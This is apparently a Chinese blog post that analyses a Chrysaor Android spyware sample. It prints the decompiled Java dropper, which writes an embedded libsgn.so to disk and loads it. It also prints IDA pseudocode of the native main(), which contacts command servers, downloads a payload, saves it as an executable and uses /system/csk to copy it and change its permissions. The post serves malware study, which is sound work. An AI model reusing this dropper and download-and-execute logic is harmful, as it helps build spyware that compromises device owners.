android malware
来源:互联网 发布:苏州app软件开发 编辑:程序博客网 时间:2024/05/23 01:23
来源:
https://github.com/fs0c131y/Android-Malwares/tree/c897dff1796c9cb7f19104e9ce3546d54cd55a45/Chrysaor/
3474625e63d0893fc8f83034e835472d95195254e1e4bdf99153b7c74eb44d86
用JEB看是这样一个结构
先看manifest发现用到了超多权限,然后入口是这里
反编译得到其Java代码
package com.network.android;import android.app.Activity;import android.os.Bundle;import java.io.ByteArrayOutputStream;import java.io.FileOutputStream;import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;public class NetworkMain extends Activity { public NetworkMain() { super(); } protected void onCreate(Bundle arg8) { super.onCreate(arg8); String v2 = "/data/data/com.network.android/libsgn.so"; try { InputStream v1 = this.getResources().getAssets().open("libsgn.so"); byte[] v0 = new byte[v1.available()]; v1.read(v0); ByteArrayOutputStream v3 = new ByteArrayOutputStream(); v3.write(v0); v3.close(); v1.close(); FileOutputStream v4 = new FileOutputStream(v2); v3.writeTo(((OutputStream)v4)); ((OutputStream)v4).close(); System.load(v2); } catch(Throwable v5) { } catch(Exception v5_1) { } catch(IOException v5_2) { } this.finish(); }}
发现并没有界面,直接将assets目录下的.so写入android的这个路径 /data/data/com.network.android/libsgn.so
,然后用
Syste.load()
加载.so,然后就得转战IDA了。
然而并不会分析,只能看一堆strings
哦对了可以看一下JNI_onLoad()
发现它调用了fork()
然后main()
!
看到main的代码很牛啊,然而很多不懂的函数
int __cdecl __noreturn main(int argc, const char **argv, const char **envp){ void *v3; // r0@1 int v4; // r5@2 int v5; // r7@6 void *v6; // r5@7 char *v7; // r0@12 const char *v8; // r2@12 const char *v9; // r3@12 char *v10; // [sp+0h] [bp-4A0h]@0 char *v11; // [sp+4h] [bp-49Ch]@0 int v12; // [sp+Ch] [bp-494h]@7 char *v13; // [sp+10h] [bp-490h]@7 int v14; // [sp+1Ch] [bp-484h]@1 int v15; // [sp+20h] [bp-480h]@1 void *ptr; // [sp+24h] [bp-47Ch]@1 int v17; // [sp+28h] [bp-478h]@7 char v18; // [sp+2Ch] [bp-474h]@1 char v19; // [sp+3Ch] [bp-464h]@1 char v20; // [sp+60h] [bp-440h]@1 char s; // [sp+84h] [bp-41Ch]@1 int v22; // [sp+484h] [bp-1Ch]@1 v14 = 0; v15 = 0; v22 = _stack_chk_guard; ptr = 0; memset(&s, 0, 0x400u); memset(&v19, 0, 0x21u); memset(&v18, 0, 0xDu); v3 = memset(&v20, 0, 0x21u); handle_signals(v3); g_sleep_time_in_seconds = 30; sleep(0x1Eu); geteuid(); while ( 1 ) { v4 = 0; if ( socket_connect(&v14, SERVERS, unk_600C) == 1 ) { get_random_hexlified_md5(&v19); get_mac_address(&v18); get_hexlified_md5(&v18, &v20, 12); if ( http_send_request_with_get(&v20, &v19, SERVERS, v14) == 1 && http_receive_payload(v14, &ptr, &v15) == 1 ) { socket_disconnect(&v14); if ( socket_connect(&v14, SERVERS, unk_600C) == 1 ) { v5 = v15; v4 = 1; if ( v15 > 0 ) { v12 = v14; v6 = ptr; v13 = SERVERS; v17 = 0; if ( file_exists("/system/csk", &v17) != 1 ) goto LABEL_17; if ( v17 ) { if ( write_buffer_as_executable(v6, v5, "/data/data/com.network.android/.coldboot_init") != 1 || system("/system/csk \"cat /data/data/com.network.android/.coldboot_init > /mnt/obb/.coldboot_init\"") == -1 || system("/system/csk \"chmod 711 /mnt/obb/.coldboot_init\"") == -1 ) {LABEL_17: v4 = 0; goto LABEL_18; } unlink("/data/data/com.network.android/.coldboot_init"); v7 = &s; v8 = "%s"; v9 = "/mnt/obb/.coldboot_init"; } else { if ( write_buffer_as_executable(v6, v5, "/data/data/com.network.android/.coldboot_init") != 1 ) goto LABEL_17; v7 = &s; v8 = "%s"; v9 = "/data/data/com.network.android/.coldboot_init"; } if ( snprintf(v7, 0x3FFu, v8, v9, v10, v11) <= 0 ) goto LABEL_17; v10 = &v19; v11 = v13; v4 = sub_1CF4(v12, &s, v17, &v20); if ( v4 != 1 ) goto LABEL_17; } } } }LABEL_18: if ( ptr ) { free(ptr); ptr = 0; } socket_disconnect(&v14); if ( v4 == 1 ) pthread_exit(0); sleep(g_sleep_time_in_seconds); }}
阅读全文
0 0
- android malware
- Android malware样本SLocker Mobile Ransomware
- Using Markov Chains for Android Malware Detection
- CopperDroid: Automatic Reconstruction of Android Malware Behaviors 阅读笔记
- Malware Detection
- malware-analysis
- malware analysis
- malware analysis
- malware bench
- Malware Corpora
- 【Android安全研究笔记】A Survey of Mobile Malware in the Wild
- 文献笔记 《DroidMat : Android Malware Detection through Manifest and API Calls Tracing 》
- Nepenthes Malware Collection
- Semantics-Aware Malware Detection
- malware analysis 实战
- Reverse-Engineering Malware
- Malware: Fighting Malicious Code
- Overview of malware inspection
- 启明之星
- Python爬取天气预报数据,并存入到本地EXCEL中
- mybatis-自动生成mapper接口实现类
- [扩展kmp] hdu6153 A Secret
- 遍历二叉树(递归与非递归)
- android malware
- PS入门-02-椭圆选择框基础操作
- Personal programming language Gym
- TCP的拥塞控制原理
- ubuntu16.04 opencv多版本管理与切换
- pyqt5入门—002—信号、槽
- Codeforces 845 B Luba And The Ticket
- 看涨吞没
- POIjava操作excel文件